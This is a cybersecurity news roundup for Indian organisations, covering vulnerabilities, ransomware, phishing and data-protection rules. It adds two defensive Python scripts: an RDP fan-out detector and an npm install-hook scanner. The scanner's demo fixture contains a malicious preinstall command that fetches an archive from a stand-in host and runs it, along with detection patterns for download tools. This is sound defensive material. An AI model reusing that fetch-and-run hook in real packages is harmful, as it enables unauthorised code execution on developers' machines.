General
High
1 May
The Cyber Express weekly roundup covers significant cybersecurity developments across healthcare, public administration, and digital platforms. It highlights major data breaches, a high-impact AI operational failure, and large-scale phishing campaigns. Taken together, the incidents show attackers operating at growing scale and sophistication, combining social engineering with weaknesses in the targeted systems. Source: The Cyber Express
Why it matters: Indian organizations must remain vigilant against evolving data breach tactics, AI-related risks, and sophisticated phishing campaigns to protect critical data and infrastructure.
General
Critical
1 May
Wireshark has released a critical security update addressing more than 40 vulnerabilities. Several of the flaws sit in Wireshark's packet parsing and can lead to arbitrary code execution when the tool processes a malformed packet off the wire or a malicious capture file. Organizations using Wireshark for network monitoring and forensics must update to version 4.6.5 immediately; until then, treat capture files from untrusted sources as potentially hostile and avoid running Wireshark with elevated privileges. Source: Cybersecurity News
Why it matters: Indian critical infrastructure operators and security teams must promptly update Wireshark to mitigate severe arbitrary code execution risks in their network analysis tools.
General
High
1 May
Two former incident response employees, previously with Sygnia and DigitalMint, received four-year prison sentences for their involvement in BlackCat (ALPHV) ransomware attacks targeting US companies. The pair were found to have facilitated the attacks while working in incident response and negotiation roles. The sentencing highlights the legal exposure of anyone complicit in ransomware operations, even those acting from the response side. Source: BleepingComputer
Why it matters: This case underscores the severe legal repercussions for individuals involved in ransomware activities, serving as a critical reminder for Indian organizations to maintain robust defenses and scrutinize third-party incident response services.
General
High
1 May
The article recommends that India's National Disaster Management Authority (NDMA) test the cyber defense capabilities of the nation's critical infrastructure. Exercising those defenses before an incident, rather than during one, is the point of such testing, and regular drills would strengthen India's resilience against evolving cyber threats. Source: Tatsatchronicle
Why it matters: Indian critical infrastructure operators should heed this call for enhanced cyber defense testing and integrate comprehensive drills into their security strategies to protect vital national assets.
General
Critical
1 May
A critical vulnerability was discovered in Google's Gemini command-line interface (Gemini CLI). The flaw could let an attacker execute arbitrary code on the host by planting malicious configuration that the tool trusts, causing commands to run outside the intended sandbox. Because such configuration can travel with a project, the bug also opened a supply chain attack path. Source: Security Week
Why it matters: Indian organizations using Gemini CLI must immediately assess their systems for this critical vulnerability and apply any available patches to prevent host code execution and supply chain attacks.
General
Critical
1 May
Qilin ransomware, which emerged in 2022, continues to refine its tradecraft. On compromised servers the group now enumerates Remote Desktop Protocol (RDP) authentication history, using the record of which accounts have connected to which hosts to map the target network quickly and with little noise before moving laterally. Source: Cybersecurity News
Why it matters: Indian organizations should harden RDP (restrict it to jump hosts or VPN access, enforce multi-factor authentication, and disable it where unused) and monitor for unusual RDP session patterns, since this reconnaissance feeds directly into lateral movement.
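One concrete form of the "monitor for suspicious RDP activity" advice is a fan-out check: one account, from one source address, opening successful RDP sessions to many distinct hosts within a short window, which is what network mapping over RDP looks like from the defender's side. The script below is an added example written for this page, not code from the Qilin report or from Cybersecurity News. It assumes Windows Security events have already been normalised to dicts by a SIEM or log shipper; the events in SAMPLE_EVENTS are constructed for this example. Event ID 4624 with LogonType 10 (RemoteInteractive) is the successful RDP logon signal used here.

```python
"""Flag RDP fan-out: one (account, source IP) reaching many hosts in a short window.

Added example for this roundup, not code from the Qilin report. Input events are
dicts as a SIEM export might produce them; SAMPLE_EVENTS is constructed data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10  # Windows LogonType 10 = RemoteInteractive (RDP)

# Constructed sample: one account sweeps four servers in under ten minutes,
# an admin does two normal logons hours apart, a service account uses a
# network logon (type 3) that should not count, and one 4625 failure is noise.
SAMPLE_EVENTS = [
    {"ts": "2026-04-30T01:00:05", "event_id": 4624, "logon_type": 10, "account": "CORP\\jdoe",   "src_ip": "10.1.1.20", "host": "FS01"},
    {"ts": "2026-04-30T01:03:40", "event_id": 4624, "logon_type": 10, "account": "CORP\\jdoe",   "src_ip": "10.1.1.20", "host": "SQL02"},
    {"ts": "2026-04-30T01:06:12", "event_id": 4624, "logon_type": 10, "account": "CORP\\jdoe",   "src_ip": "10.1.1.20", "host": "DC01"},
    {"ts": "2026-04-30T01:08:55", "event_id": 4624, "logon_type": 10, "account": "CORP\\jdoe",   "src_ip": "10.1.1.20", "host": "BACKUP01"},
    {"ts": "2026-04-30T01:09:30", "event_id": 4625, "logon_type": 10, "account": "CORP\\jdoe",   "src_ip": "10.1.1.20", "host": "HR-APP"},
    {"ts": "2026-04-30T09:15:00", "event_id": 4624, "logon_type": 10, "account": "CORP\\admin1", "src_ip": "10.1.5.9",  "host": "FS01"},
    {"ts": "2026-04-30T14:40:00", "event_id": 4624, "logon_type": 10, "account": "CORP\\admin1", "src_ip": "10.1.5.9",  "host": "SQL02"},
    {"ts": "2026-04-30T02:00:00", "event_id": 4624, "logon_type": 3,  "account": "CORP\\svc",    "src_ip": "10.1.1.20", "host": "FS01"},
]


def detect_rdp_fanout(events, window=timedelta(minutes=30), threshold=3):
    """Return one alert per (account, src_ip) that opened successful RDP sessions
    to at least `threshold` distinct hosts inside any sliding window of `window`.
    Failed logons (4625) and non-RDP logon types are ignored here."""
    rdp = [e for e in events if e["event_id"] == 4624 and e["logon_type"] == RDP_LOGON_TYPE]
    rdp.sort(key=lambda e: e["ts"])  # ISO-8601 strings sort chronologically

    by_actor = defaultdict(list)
    for e in rdp:
        by_actor[(e["account"], e["src_ip"])].append((datetime.fromisoformat(e["ts"]), e["host"]))

    alerts = []
    for (account, src_ip), logons in by_actor.items():
        start = 0
        best = set()
        for end in range(len(logons)):
            # Advance the window start until every logon in [start, end] fits in `window`.
            while logons[end][0] - logons[start][0] > window:
                start += 1
            hosts = {h for _, h in logons[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= threshold:
            alerts.append({"account": account, "src_ip": src_ip, "hosts": sorted(best),
                           "window_minutes": window.total_seconds() / 60})
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_fanout(SAMPLE_EVENTS):
        print(f"RDP fan-out: {a['account']} from {a['src_ip']} -> {', '.join(a['hosts'])}")
```

Tune `threshold` and `window` against a baseline of your own jump-host traffic; administrators who legitimately touch many servers should be allow-listed by source address rather than by account, since a compromised admin account from an unexpected workstation is exactly the case worth catching.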
General
Critical
1 May
Artificial intelligence is significantly enhancing the scale, speed, and success of cybercrime, leading to industrialized attacks. The time available for organizations to patch or respond to vulnerabilities before exploitation has drastically reduced to mere hours. Cybersecurity defenders must urgently leverage AI and automation to effectively counter these rapidly evolving and sophisticated threats. Source: Security Week
Why it matters: Indian critical infrastructure operators must urgently enhance their defensive capabilities with AI and automation to counter rapidly evolving, industrialized cyber threats and shrinking exploit windows.
Transport
High
1 May
The FBI has issued a warning regarding a significant increase in cyber-enabled cargo theft, primarily targeting the transportation and logistics industry. This trend is projected to cause substantial financial losses, estimated at nearly $725 million in the United States and Canada by 2025. Cybercriminals are increasingly leveraging digital methods to facilitate the physical theft of […]
Why it matters: Indian transportation and logistics companies must enhance cybersecurity defenses and supply chain vigilance to mitigate similar global cyber-enabled cargo theft risks.
General
High
1 May
A new phishing kit named Bluekit has been identified, offering over 40 templates designed to target various popular online services. This service incorporates basic AI features to assist threat actors in generating campaign drafts, streamlining the creation of malicious phishing emails. The combination of AI and a broad template library significantly enhances the efficiency and […]
Why it matters: Indian organisations must enhance their phishing detection capabilities and employee training to counter the increased sophistication enabled by AI-powered phishing kits like Bluekit.
General
High
30 Apr
A new supply chain attack, dubbed Mini Shai-Hulud, is actively targeting SAP's npm packages. The malicious packages use a preinstall lifecycle hook to fetch a Bun binary and run their payload under that runtime instead of Node.js, which the reporting says lets the attack evade existing security monitoring. The result is unauthorized code execution on any developer workstation or build agent that installs an affected package. Source: Security Week
Why it matters: Indian organizations that consume SAP's npm packages, or npm dependencies generally, should pin dependency versions, install with lifecycle scripts disabled where their builds allow it, and review install-time hooks as part of their supply chain security controls.
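The practitioner check that follows from this entry is to audit the dependency tree for install-time lifecycle hooks, since `preinstall`, `install`, `postinstall` and `prepare` scripts run with the installing user's privileges before any application code is ever reviewed. The scanner below is an added example written for this page, not code from the Mini Shai-Hulud analysis, from SAP or from npm. It walks a directory of `package.json` files (normally `node_modules/`), lists every package declaring such a hook, and attaches heuristic flags when the script text downloads something, launches the `bun` runtime, evaluates inline code, or writes to a temp directory. The packages created in `demo()` are constructed for this example; the heuristic patterns are the author's assumptions and will need tuning.

```python
"""Audit an npm dependency tree for install-time lifecycle hooks.

Added example, not code from the reported attack, SAP or npm. The sample
packages built in demo() are constructed; the regexes are heuristics only.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns (assumptions for this example). Many legitimate packages
# compile native code in install hooks, so every finding needs human review.
SUSPICIOUS_PATTERNS = {
    "downloads a payload": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b|https?://", re.I),
    "launches bun runtime": re.compile(r"(^|[\s;&|/])bunx?(\s|$)", re.I),
    "inline script execution": re.compile(r"\b(node|bun)\s+-e\b|\beval\(", re.I),
    "writes to temp dir": re.compile(r"(/tmp/|%TEMP%|\$TMPDIR)", re.I),
}


def classify_script(script: str) -> list:
    """Return the heuristic reasons a hook script looks risky (empty if none)."""
    return [reason for reason, pat in SUSPICIOUS_PATTERNS.items() if pat.search(script)]


def find_install_hooks(root: str) -> list:
    """List every package under `root` that declares an install-time hook."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or not JSON; a production scanner would log this
        scripts = manifest.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            script = scripts.get(hook)
            if not script:
                continue
            findings.append({
                "package": manifest.get("name", os.path.relpath(dirpath, root)),
                "version": manifest.get("version", "?"),
                "hook": hook,
                "script": script,
                "reasons": classify_script(script),
            })
    findings.sort(key=lambda f: (f["package"], f["hook"]))
    return findings


def demo() -> list:
    """Build a constructed node_modules tree in a temp dir and scan it."""
    samples = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0",
                         "scripts": {"test": "node test.js"}},
        "native-thing": {"name": "native-thing", "version": "2.3.1",
                         "scripts": {"install": "node-gyp rebuild"}},
        "@acme/evil": {"name": "@acme/evil", "version": "9.9.9",
                       "scripts": {"preinstall": "curl -fsSL https://example.invalid/bun.tar.gz | "
                                                 "tar xz -C /tmp && /tmp/bun/bun setup.js"}},
    }
    with tempfile.TemporaryDirectory() as root:
        for name, manifest in samples.items():
            pkg_dir = os.path.join(root, "node_modules", *name.split("/"))
            os.makedirs(pkg_dir)
            with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
                json.dump(manifest, fh)
        return find_install_hooks(root)


if __name__ == "__main__":
    for f in demo():
        flags = ", ".join(f["reasons"]) or "no heuristic match"
        print(f"{f['package']}@{f['version']} {f['hook']}: {f['script']!r} [{flags}]")
```

Run it against a real checkout with `find_install_hooks("node_modules")`. A package like `native-thing` will appear as a hook with no flags, which is the expected noise from native add-ons; the `@acme/evil` pattern (download, then hand off to a separate runtime) is the one to block. Installing with `npm ci --ignore-scripts`, or setting `ignore-scripts=true` in `.npmrc` and re-enabling scripts only for packages that genuinely need them, removes this execution path from CI entirely.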
General
High
30 Apr
New research reveals that attackers begin scanning newly deployed assets within minutes of them going live. Automated attacks can progress from initial discovery to full compromise in under 24 hours. This highlights the critical need for immediate security hardening and monitoring of all new infrastructure. Source: BleepingComputer
Why it matters: Indian organizations must implement robust security-by-design principles and immediate post-deployment security checks to mitigate the rapid exploitation window for new assets.
General
High
30 Apr
The April 2026 KB5083769 security update for Windows 11 is causing significant issues. It is reported to break third-party backup applications on systems running Windows 11 24H2 and 25H2. This defect compromises data recovery capabilities and operational resilience for affected organizations. Source: BleepingComputer
Why it matters: Indian critical infrastructure operators must exercise caution with this Windows 11 update, as backup failures could severely impact incident recovery and business continuity.
General
High
30 Apr
Cybersecurity researchers have detailed DEEP#DOOR, a stealthy Python-based backdoor framework. This backdoor establishes persistent access and harvests sensitive browser and cloud credentials from compromised Windows hosts. The intrusion chain begins by disabling Windows security controls via a batch script. Source: The Hacker News
Why it matters: Indian organizations must update security controls, monitor for DEEP#DOOR indicators, and educate users to prevent credential theft and unauthorized access.
General
High
30 Apr
Governments globally are sounding alerts over data privacy and surveillance risks posed by foreign AI tools. India has enacted the Digital Personal Data Protection Act, 2023, to address these specific challenges. This law provides a framework for managing personal data and mitigating potential risks from AI tool usage. Source: Msn
Why it matters: Indian organizations must understand and comply with the DPDP Act when deploying foreign AI tools to safeguard sensitive data and avoid regulatory penalties.
General
High
30 Apr
India's data protection framework has transitioned from high-level legislation to detailed, actionable rules. This shift is generating sustained demand for expertise in privacy governance. Organisations must now focus on implementing robust incident management strategies to ensure compliance. Source: Legalbusinessonline
Why it matters: Indian organisations must proactively update their privacy governance and incident response protocols to align with these detailed and evolving data protection regulations.
Banking
High
30 Apr
The Indian Banks' Association (IBA) is initiating discussions with banks to evaluate potential risks posed by Anthropic's Mythos AI model. India's Computer Emergency Response Team (CERT-In) has also engaged with bankers regarding this issue. Financial institutions are reportedly considering enlisting global technology firms like Microsoft and IBM to aid in this critical risk assessment. Source: […]
Why it matters: This proactive assessment by Indian banking bodies and CERT-In underscores the importance for all Indian critical infrastructure operators to evaluate and manage cybersecurity risks associated with emerging AI technologies.
General
Critical
30 Apr
Researchers have identified two critical vulnerabilities in EnOcean SmartServer systems, enabling security bypass and remote code execution. These flaws could allow attackers to remotely compromise building management systems. The discovery highlights the importance of securing OT/IoT devices within critical infrastructure. Source: Security Week
Why it matters: Indian organizations utilizing EnOcean SmartServer or similar building management systems must promptly assess their exposure and implement necessary security measures to prevent remote exploitation.
Banking
High
30 Apr
The Reserve Bank of India and the Finance Ministry are urging Indian banks to significantly enhance their cybersecurity frameworks. This push reflects growing regulatory concerns, potentially driven by advancements in AI and evolving cyber threats. The Indian Computer Emergency Response Team (CERT-In) has also issued related advisories, emphasizing the critical need for stronger cyber defenses […]
Why it matters: This directive requires Indian financial institutions to prioritize and implement robust cybersecurity measures, ensuring compliance with regulatory mandates and safeguarding critical infrastructure against emerging threats.
General
Medium
30 Apr
CERT-In organized 'CERT-In SAMVAAD 2026', a three-day National Annual Conference. The event brought together over 500 delegates to discuss and strengthen India's cybersecurity audit framework, with the aim of raising the nation's overall cyber resilience and security posture. Source: PIB
Why it matters: Indian organizations, especially those in critical infrastructure, should monitor outcomes from CERT-In's conferences as they often shape future audit requirements and best practices.
General
High
30 Apr
CERT-In recently hosted 'SAMVAAD 2026' where India unveiled its next-generation cybersecurity audit framework. This new framework aims to enhance the cybersecurity posture across various sectors. It signifies a proactive step by India to strengthen its digital defenses and compliance standards. Source: Devdiscourse
Why it matters: Indian organizations, especially those in critical infrastructure, must prepare to align their cybersecurity practices with this new national audit framework to ensure compliance and bolster their defenses.